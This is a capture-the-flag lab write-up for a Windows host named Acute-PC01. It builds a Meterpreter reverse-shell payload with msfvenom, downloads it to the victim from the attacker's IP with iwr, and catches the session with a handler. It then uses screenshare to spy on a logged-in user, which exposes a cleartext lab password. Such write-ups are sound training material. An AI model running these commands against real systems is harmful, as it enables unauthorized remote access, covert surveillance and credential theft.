InfoSec LAB

Acute_Interactive_Session

Created: 3 min read

Interactive Session

As discovered by PEAS earlier, there appears to be an active session to the Acute-PC01 host

PS C:\Utils> query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 edavies               console             1  Active      none   07/11/2023 04:33

While it doesn’t appear to be a RDP session as claimed by PEAS, the output result isn’t me either as the logon time attribute shows a complete different logon time. It’s much earlier compared to mine.

This would likely mean that there is someone on the other end using the Acute-PC01 host.

While there are many ways to go about this, I will be using the Metasploit’s screenshare module to take a look at what the user is doing In order to do that, I would first need to establish a meterpreter session

Meterpreter

┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.8 LPORT=9998 -f exe -o msf.exe 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: msf.exe

msfvenom generated a staged meterpreter payload. Executing this binary on the host system will connect to the listener and listener will send out the remaining payload

PS C:\Utils> iwr -Uri 'http://10.10.16.8/msf.exe' -OutFile C:\Utils\msf.exe

Transferring the staged payload over HTTP

┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ msfconsole                                                     
 
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.6.8
LHOST => 10.10.6.8
msf6 exploit(multi/handler) > set LPORT 9998
LPORT => 9998
msf6 exploit(multi/handler) > run
 
[-] Handler failed to bind to 10.10.6.8:9998:-  -
[*] Started reverse TCP handler on 0.0.0.0:9998

Listener is all set and running

Executing the staged payload on the Acute-PC01 host

[*] Sending stage (200774 bytes) to 10.10.11.145
[*] Meterpreter session 2 opened (10.10.16.8:9998 -> 10.10.11.145:49799) at 2023-11-07 17:59:12 +0100
 
meterpreter >

A meterpreter session has been established

screenshare

meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /home/kali/archive/htb/labs/acute/kIouYSmS.html
[*] Streaming...

Executing the screenshare module This will stream the current interactive session to the /home/kali/archive/htb/labs/acute/kIouYSmS.html file

It’s indeed an interactive session by the edavies user

CLEARTEXT Credential

A moment later, the user has opened up a PowerShell and typed in a few commands. Those commands are;

  • Attempting to start another PowerShell session to the ATSSERVER host as the imonks user.
    • under the dc_manage configuration
  • Creating a PSCredential object of the imonks user with the CLEARTEXT password; W3_4R3_th3_f0rce.
  • Interestingly, the command fails with the PowerShell’s Measure-Object cmdlet being not recognized Moving on to the Lateral Movement phase

Interactive Graph View

Backlinks